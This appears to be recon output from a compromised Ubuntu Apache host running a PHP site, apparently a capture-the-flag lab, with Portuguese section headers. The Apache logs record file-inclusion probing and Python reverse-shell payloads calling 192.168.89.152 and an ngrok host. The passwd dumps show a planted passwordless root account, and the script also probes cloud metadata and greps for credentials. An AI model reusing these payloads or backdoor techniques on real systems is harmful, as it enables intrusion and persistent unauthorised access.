[Thu Jan 15 11:58:05.899030 2026] [php:warn] [pid 1471] [client 172.17.0.1:47372] PHP Warning:  Unknown: Failed to open stream: Permission denied in Unknown on line 0
[Thu Jan 15 11:58:05.899052 2026] [php:error] [pid 1471] [client 172.17.0.1:47372] PHP Fatal error:  Failed opening required '/var/www/blogo/test.php' (include_path='.:/usr/share/php') in Unknown on line 0
[Thu Jan 15 11:58:22.565582 2026] [php:warn] [pid 1436] [client 172.17.0.1:39216] PHP Warning:  Undefined variable $daemon in /var/www/blogo/test.php on line 111
[Thu Jan 15 11:58:22.566284 2026] [php:warn] [pid 1436] [client 172.17.0.1:39216] PHP Warning:  Undefined variable $daemon in /var/www/blogo/test.php on line 111
[Thu Jan 15 12:00:32.840583 2026] [php:warn] [pid 1436] [client 172.17.0.1:39216] PHP Warning:  Undefined variable $daemon in /var/www/blogo/test.php on line 111
[Thu Jan 15 12:00:46.209867 2026] [php:warn] [pid 1443] [client 172.17.0.1:49594] PHP Warning:  include(files/../files/test.php?cmd=export RHOST=&quot;192.168.89.152&quot;;export RPORT=4444;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(&quot;RHOST&quot;),int(os.getenv(&quot;RPORT&quot;))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(&quot;sh&quot;)'): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 12:00:46.209914 2026] [php:warn] [pid 1443] [client 172.17.0.1:49594] PHP Warning:  include(): Failed opening 'files/../files/test.php?cmd=export RHOST=&quot;192.168.89.152&quot;;export RPORT=4444;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(&quot;RHOST&quot;),int(os.getenv(&quot;RPORT&quot;))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(&quot;sh&quot;)'' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 12:02:05.039909 2026] [php:warn] [pid 1447] [client 172.17.0.1:33156] PHP Warning:  include(files/../files/test.php?cmd=sh -i &gt;): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 12:02:05.039941 2026] [php:warn] [pid 1447] [client 172.17.0.1:33156] PHP Warning:  include(): Failed opening 'files/../files/test.php?cmd=sh -i &gt;' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
[Thu Jan 15 12:26:02.400239 2026] [core:error] [pid 1451] (13)Permission denied: [client 172.17.0.1:35562] AH00132: file permissions deny server access: /var/www/blogo/test.txt
[Thu Jan 15 12:26:12.785160 2026] [mpm_prefork:notice] [pid 1158] AH00169: caught SIGTERM, shutting down
[Thu Jan 15 12:26:13.817835 2026] [mpm_prefork:notice] [pid 1858] AH00163: Apache/2.4.58 (Ubuntu) configured -- resuming normal operations
[Thu Jan 15 12:26:13.817867 2026] [core:notice] [pid 1858] AH00094: Command line: '/usr/sbin/apache2'
[Fri Jan 16 02:50:59.017330 2026] [core:warn] [pid 26] AH00098: pid file /var/run/apache2/apache2.pid overwritten -- Unclean shutdown of previous Apache run?
[Fri Jan 16 02:50:59.024733 2026] [mpm_prefork:notice] [pid 26] AH00163: Apache/2.4.58 (Ubuntu) configured -- resuming normal operations
[Fri Jan 16 02:50:59.024778 2026] [core:notice] [pid 26] AH00094: Command line: '/usr/sbin/apache2'
[Fri Jan 16 11:00:13.153331 2026] [core:warn] [pid 26] AH00098: pid file /var/run/apache2/apache2.pid overwritten -- Unclean shutdown of previous Apache run?
[Fri Jan 16 11:00:13.162532 2026] [mpm_prefork:notice] [pid 26] AH00163: Apache/2.4.58 (Ubuntu) configured -- resuming normal operations
[Fri Jan 16 11:00:13.162570 2026] [core:notice] [pid 26] AH00094: Command line: '/usr/sbin/apache2'
[Tue Mar 10 10:26:16.916719 2026] [core:warn] [pid 26] AH00098: pid file /var/run/apache2/apache2.pid overwritten -- Unclean shutdown of previous Apache run?
[Tue Mar 10 10:26:16.925258 2026] [mpm_prefork:notice] [pid 26] AH00163: Apache/2.4.58 (Ubuntu) configured -- resuming normal operations
[Tue Mar 10 10:26:16.925291 2026] [core:notice] [pid 26] AH00094: Command line: '/usr/sbin/apache2'
  File "<string>", line 1
    import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"0.tcp.sa.ngrok.io\",14293));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])
                                                                                               ^
SyntaxError: unexpected character after line continuation character
[Tue Mar 10 10:35:53.720261 2026] [php:error] [pid 43] [client 179.54.201.149:60206] PHP Parse error:  syntax error, unexpected token "\\" in /var/www/blogo/rev.php on line 2

--- grep por 'projects-blogo' / '10.0.' / 'internal' em logs Apache ---
/var/log/apache2/error.log:[Thu Jan 15 11:17:08.819709 2026] [authz_core:error] [pid 1393] [client 172.17.0.1:41912] AH01630: client denied by server configuration: /var/www/blogo/files/reginternal
/var/log/apache2/error.log:[Thu Jan 15 11:17:08.819878 2026] [authz_core:error] [pid 1368] [client 172.17.0.1:41896] AH01630: client denied by server configuration: /var/www/blogo/files/reginternal.json
/var/log/apache2/error.log:[Thu Jan 15 11:17:45.585398 2026] [php:warn] [pid 1403] [client 172.17.0.1:43078] PHP Warning:  include(files/_internal.txt): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:17:45.585406 2026] [php:warn] [pid 1403] [client 172.17.0.1:43078] PHP Warning:  include(): Failed opening 'files/_internal.txt' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:17:45.585443 2026] [php:warn] [pid 1407] [client 172.17.0.1:42678] PHP Warning:  include(files/_internal): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:17:45.585451 2026] [php:warn] [pid 1407] [client 172.17.0.1:42678] PHP Warning:  include(): Failed opening 'files/_internal' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:17:45.586361 2026] [php:warn] [pid 1396] [client 172.17.0.1:43074] PHP Warning:  include(files/_internal.json): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:17:45.586369 2026] [php:warn] [pid 1396] [client 172.17.0.1:43074] PHP Warning:  include(): Failed opening 'files/_internal.json' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:18:01.398160 2026] [php:warn] [pid 1376] [client 172.17.0.1:49706] PHP Warning:  include(files/internal): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:18:01.398174 2026] [php:warn] [pid 1376] [client 172.17.0.1:49706] PHP Warning:  include(): Failed opening 'files/internal' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:18:01.399836 2026] [php:warn] [pid 1438] [client 172.17.0.1:49590] PHP Warning:  include(files/internal.txt): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:18:01.399859 2026] [php:warn] [pid 1438] [client 172.17.0.1:49590] PHP Warning:  include(): Failed opening 'files/internal.txt' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:18:01.400328 2026] [php:warn] [pid 1403] [client 172.17.0.1:49624] PHP Warning:  include(files/internal_data.json): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:18:01.400336 2026] [php:warn] [pid 1403] [client 172.17.0.1:49624] PHP Warning:  include(): Failed opening 'files/internal_data.json' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:18:01.400336 2026] [php:warn] [pid 1429] [client 172.17.0.1:49550] PHP Warning:  include(files/internal.json): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:18:01.400344 2026] [php:warn] [pid 1429] [client 172.17.0.1:49550] PHP Warning:  include(): Failed opening 'files/internal.json' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:18:01.400877 2026] [php:warn] [pid 1437] [client 172.17.0.1:49528] PHP Warning:  include(files/internal_data): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:18:01.400883 2026] [php:warn] [pid 1421] [client 172.17.0.1:49388] PHP Warning:  include(files/internals): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:18:01.400894 2026] [php:warn] [pid 1437] [client 172.17.0.1:49528] PHP Warning:  include(): Failed opening 'files/internal_data' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:18:01.400896 2026] [php:warn] [pid 1421] [client 172.17.0.1:49388] PHP Warning:  include(): Failed opening 'files/internals' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:18:01.402263 2026] [php:warn] [pid 1407] [client 172.17.0.1:49618] PHP Warning:  include(files/internals.txt): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:18:01.402273 2026] [php:warn] [pid 1407] [client 172.17.0.1:49618] PHP Warning:  include(): Failed opening 'files/internals.txt' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:18:01.403444 2026] [php:warn] [pid 1437] [client 172.17.0.1:49528] PHP Warning:  include(files/internals.json): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:18:01.403456 2026] [php:warn] [pid 1437] [client 172.17.0.1:49528] PHP Warning:  include(): Failed opening 'files/internals.json' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:18:01.403850 2026] [php:warn] [pid 1408] [client 172.17.0.1:49518] PHP Warning:  include(files/internaltools.txt): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:18:01.403872 2026] [php:warn] [pid 1408] [client 172.17.0.1:49518] PHP Warning:  include(): Failed opening 'files/internaltools.txt' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:18:01.403979 2026] [php:warn] [pid 1415] [client 172.17.0.1:49576] PHP Warning:  include(files/internaltools): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:18:01.403987 2026] [php:warn] [pid 1415] [client 172.17.0.1:49576] PHP Warning:  include(): Failed opening 'files/internaltools' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:18:01.405132 2026] [php:warn] [pid 1403] [client 172.17.0.1:49624] PHP Warning:  include(files/internaltools.json): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:18:01.405141 2026] [php:warn] [pid 1403] [client 172.17.0.1:49624] PHP Warning:  include(): Failed opening 'files/internaltools.json' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:18:01.414021 2026] [php:warn] [pid 1400] [client 172.17.0.1:49396] PHP Warning:  include(files/internal_data.txt): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:18:01.414030 2026] [php:warn] [pid 1400] [client 172.17.0.1:49396] PHP Warning:  include(): Failed opening 'files/internal_data.txt' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:18:09.046288 2026] [php:warn] [pid 1412] [client 172.17.0.1:48924] PHP Warning:  include(files/reginternal): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:18:09.046299 2026] [php:warn] [pid 1412] [client 172.17.0.1:48924] PHP Warning:  include(): Failed opening 'files/reginternal' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:18:09.046686 2026] [php:warn] [pid 1425] [client 172.17.0.1:48866] PHP Warning:  include(files/reginternal.json): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:18:09.046696 2026] [php:warn] [pid 1425] [client 172.17.0.1:48866] PHP Warning:  include(): Failed opening 'files/reginternal.json' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:18:09.056245 2026] [php:warn] [pid 1433] [client 172.17.0.1:48850] PHP Warning:  include(files/reginternal.txt): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:18:09.056253 2026] [php:warn] [pid 1433] [client 172.17.0.1:48850] PHP Warning:  include(): Failed opening 'files/reginternal.txt' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:26:35.015944 2026] [php:warn] [pid 1425] [client 172.17.0.1:58336] PHP Warning:  include(files/../_internal.txt): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:26:35.015959 2026] [php:warn] [pid 1425] [client 172.17.0.1:58336] PHP Warning:  include(): Failed opening 'files/../_internal.txt' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:26:35.016015 2026] [php:warn] [pid 1444] [client 172.17.0.1:58292] PHP Warning:  include(files/../_internal.json): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:26:35.016024 2026] [php:warn] [pid 1444] [client 172.17.0.1:58292] PHP Warning:  include(): Failed opening 'files/../_internal.json' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:26:35.016195 2026] [php:warn] [pid 1430] [client 172.17.0.1:58338] PHP Warning:  include(files/../_internal): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:26:35.016205 2026] [php:warn] [pid 1430] [client 172.17.0.1:58338] PHP Warning:  include(): Failed opening 'files/../_internal' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:26:53.136426 2026] [php:warn] [pid 1457] [client 172.17.0.1:46246] PHP Warning:  include(files/../files/_internal.json): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:26:53.136435 2026] [php:warn] [pid 1457] [client 172.17.0.1:46246] PHP Warning:  include(): Failed opening 'files/../files/_internal.json' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:26:53.136795 2026] [php:warn] [pid 1465] [client 172.17.0.1:46306] PHP Warning:  include(files/../files/_internal): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:26:53.136807 2026] [php:warn] [pid 1465] [client 172.17.0.1:46306] PHP Warning:  include(): Failed opening 'files/../files/_internal' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:26:53.139485 2026] [php:warn] [pid 1464] [client 172.17.0.1:46590] PHP Warning:  include(files/../files/_internal.txt): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:26:53.139494 2026] [php:warn] [pid 1464] [client 172.17.0.1:46590] PHP Warning:  include(): Failed opening 'files/../files/_internal.txt' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:27:05.113989 2026] [php:warn] [pid 1415] [client 172.17.0.1:36196] PHP Warning:  include(files/../files/internal_data): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:27:05.113997 2026] [php:warn] [pid 1415] [client 172.17.0.1:36196] PHP Warning:  include(): Failed opening 'files/../files/internal_data' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:27:05.114172 2026] [php:warn] [pid 1465] [client 172.17.0.1:36178] PHP Warning:  include(files/../files/internal.txt): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:27:05.114180 2026] [php:warn] [pid 1465] [client 172.17.0.1:36178] PHP Warning:  include(): Failed opening 'files/../files/internal.txt' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:27:05.114220 2026] [php:warn] [pid 1417] [client 172.17.0.1:36000] PHP Warning:  include(files/../files/internal): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:27:05.114227 2026] [php:warn] [pid 1417] [client 172.17.0.1:36000] PHP Warning:  include(): Failed opening 'files/../files/internal' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:27:05.114704 2026] [php:warn] [pid 1342] [client 172.17.0.1:36106] PHP Warning:  include(files/../files/internal_data.json): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:27:05.114716 2026] [php:warn] [pid 1342] [client 172.17.0.1:36106] PHP Warning:  include(): Failed opening 'files/../files/internal_data.json' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:27:05.115099 2026] [php:warn] [pid 1448] [client 172.17.0.1:36058] PHP Warning:  include(files/../files/internal_data.txt): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:27:05.115107 2026] [php:warn] [pid 1448] [client 172.17.0.1:36058] PHP Warning:  include(): Failed opening 'files/../files/internal_data.txt' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:27:05.116003 2026] [php:warn] [pid 1415] [client 172.17.0.1:36196] PHP Warning:  include(files/../files/internals): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:27:05.116013 2026] [php:warn] [pid 1415] [client 172.17.0.1:36196] PHP Warning:  include(): Failed opening 'files/../files/internals' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:27:05.116951 2026] [php:warn] [pid 1467] [client 172.17.0.1:36086] PHP Warning:  include(files/../files/internaltools.json): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:27:05.116960 2026] [php:warn] [pid 1467] [client 172.17.0.1:36086] PHP Warning:  include(): Failed opening 'files/../files/internaltools.json' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:27:05.117790 2026] [php:warn] [pid 1436] [client 172.17.0.1:36012] PHP Warning:  include(files/../files/internals.txt): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:27:05.117800 2026] [php:warn] [pid 1436] [client 172.17.0.1:36012] PHP Warning:  include(): Failed opening 'files/../files/internals.txt' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:27:05.118275 2026] [php:warn] [pid 1453] [client 172.17.0.1:36038] PHP Warning:  include(files/../files/internal.json): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:27:05.118284 2026] [php:warn] [pid 1453] [client 172.17.0.1:36038] PHP Warning:  include(): Failed opening 'files/../files/internal.json' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:27:05.118562 2026] [php:warn] [pid 1441] [client 172.17.0.1:36074] PHP Warning:  include(files/../files/internaltools): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:27:05.118570 2026] [php:warn] [pid 1441] [client 172.17.0.1:36074] PHP Warning:  include(): Failed opening 'files/../files/internaltools' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:27:05.118786 2026] [php:warn] [pid 1430] [client 172.17.0.1:35866] PHP Warning:  include(files/../files/internals.json): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:27:05.118795 2026] [php:warn] [pid 1430] [client 172.17.0.1:35866] PHP Warning:  include(): Failed opening 'files/../files/internals.json' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:27:05.119244 2026] [php:warn] [pid 1474] [client 172.17.0.1:35880] PHP Warning:  include(files/../files/internaltools.txt): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:27:05.119252 2026] [php:warn] [pid 1474] [client 172.17.0.1:35880] PHP Warning:  include(): Failed opening 'files/../files/internaltools.txt' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:27:12.942302 2026] [php:warn] [pid 1455] [client 172.17.0.1:57480] PHP Warning:  include(files/../files/reginternal): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:27:12.942312 2026] [php:warn] [pid 1455] [client 172.17.0.1:57480] PHP Warning:  include(): Failed opening 'files/../files/reginternal' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:27:12.943071 2026] [php:warn] [pid 1415] [client 172.17.0.1:37438] PHP Warning:  include(files/../files/reginternal.json): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:27:12.943080 2026] [php:warn] [pid 1415] [client 172.17.0.1:37438] PHP Warning:  include(): Failed opening 'files/../files/reginternal.json' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:27:12.946868 2026] [php:warn] [pid 1453] [client 172.17.0.1:57656] PHP Warning:  include(files/../files/reginternal.txt): Failed to open stream: No such file or directory in /var/www/blogo/noticias.php on line 160
/var/log/apache2/error.log:[Thu Jan 15 11:27:12.946898 2026] [php:warn] [pid 1453] [client 172.17.0.1:57656] PHP Warning:  include(): Failed opening 'files/../files/reginternal.txt' for inclusion (include_path='.:/usr/share/php') in /var/www/blogo/noticias.php on line 160

--- /var/log/below (se existir) ---
total 16
drwxrwxrwx 1 root      root      4096 Mar 10 10:43 .
drwxr-xr-x 1 root      root      4096 Jan 12 18:20 ..
lrwxrwxrwx 1 adalberto adalberto   11 Mar 10 10:43 error_root.log -> /etc/passwd
drwxr-xr-x 2 root      root      4096 Mar 10 10:43 store
>> /var/log/below/error_root.log
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
mysql:x:100:101:MySQL Server,,,:/nonexistent:/bin/false
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:101:103::/nonexistent:/usr/sbin/nologin
systemd-resolve:x:996:996:systemd Resolver:/:/usr/sbin/nologin
polkitd:x:995:995:User for polkitd:/:/usr/sbin/nologin
adalberto:x:1001:1001:User:/home/adalberto:/bin/bash
0xdtc::0:0:0xdtc:/root:/bin/bash


==================== 7. Usuários, homes e chaves SSH ====================

--- /etc/passwd ---
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
mysql:x:100:101:MySQL Server,,,:/nonexistent:/bin/false
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:101:103::/nonexistent:/usr/sbin/nologin
systemd-resolve:x:996:996:systemd Resolver:/:/usr/sbin/nologin
polkitd:x:995:995:User for polkitd:/:/usr/sbin/nologin
adalberto:x:1001:1001:User:/home/adalberto:/bin/bash
0xdtc::0:0:0xdtc:/root:/bin/bash

--- /root ---
total 48
drwx------ 1 root root 4096 Mar 10 10:46 .
drwxr-xr-x 1 root root 4096 Mar 10 10:46 ..
-rw------- 1 root root    6 Jan 16 11:01 .bash_history
-rw-r--r-- 1 root root 3127 Jan 12 17:17 .bashrc
drwxr-xr-x 3 root root 4096 Jan 12 17:17 .cargo
drwxr-xr-x 1 root root 4096 Jan 12 18:12 .local
-rw------- 1 root root    1 Jan 15 22:24 .mysql_history
-rw-r--r-- 1 root root  182 Jan 12 17:17 .profile
drwxr-xr-x 6 root root 4096 Jan 12 17:17 .rustup
drwx------ 2 root root 4096 Jan 11 16:17 .ssh
-rw-r--r-- 1 root root  180 Mar 10 10:46 .wget-hsts
-rw-r--r-- 1 root root   31 Jan 15 22:24 flag.txt

--- /home ---
total 20
drwxr-xr-x 1 root      root      4096 Jan 12 17:24 .
drwxr-xr-x 1 root      root      4096 Mar 10 10:46 ..
drwxr-x--- 1 adalberto adalberto 4096 Mar 10 10:42 adalberto
drwxr-x--- 2 ubuntu    ubuntu    4096 May 28  2025 ubuntu

--- /root/.ssh ---
total 8
drwx------ 2 root root 4096 Jan 11 16:17 .
drwx------ 1 root root 4096 Mar 10 10:46 ..

--- /home/*/.ssh ---

--- Históricos de shell (root e usuários) ---

exit

>> /home/adalberto/.bash_history

exit


==================== 8. AWS Instance Metadata (se disponível) ====================

--- Testando acesso ao metadata 169.254.169.254 ---
(nenhuma role IAM retornada ou metadata indisponível)


==================== 9. Grep por hosts internos, projetos e credenciais em /etc e /var/www ====================

--- /etc (10\.0\.|192\.168\.|internal|projects|blogo) ---

--- /var/www (10\.0\.|192\.168\.|internal|projects|blogo|password|passwd) ---


==================== Fim ====================

Finalizado: Tue Mar 10 10:47:22 -03 2026
[*] Concluído.
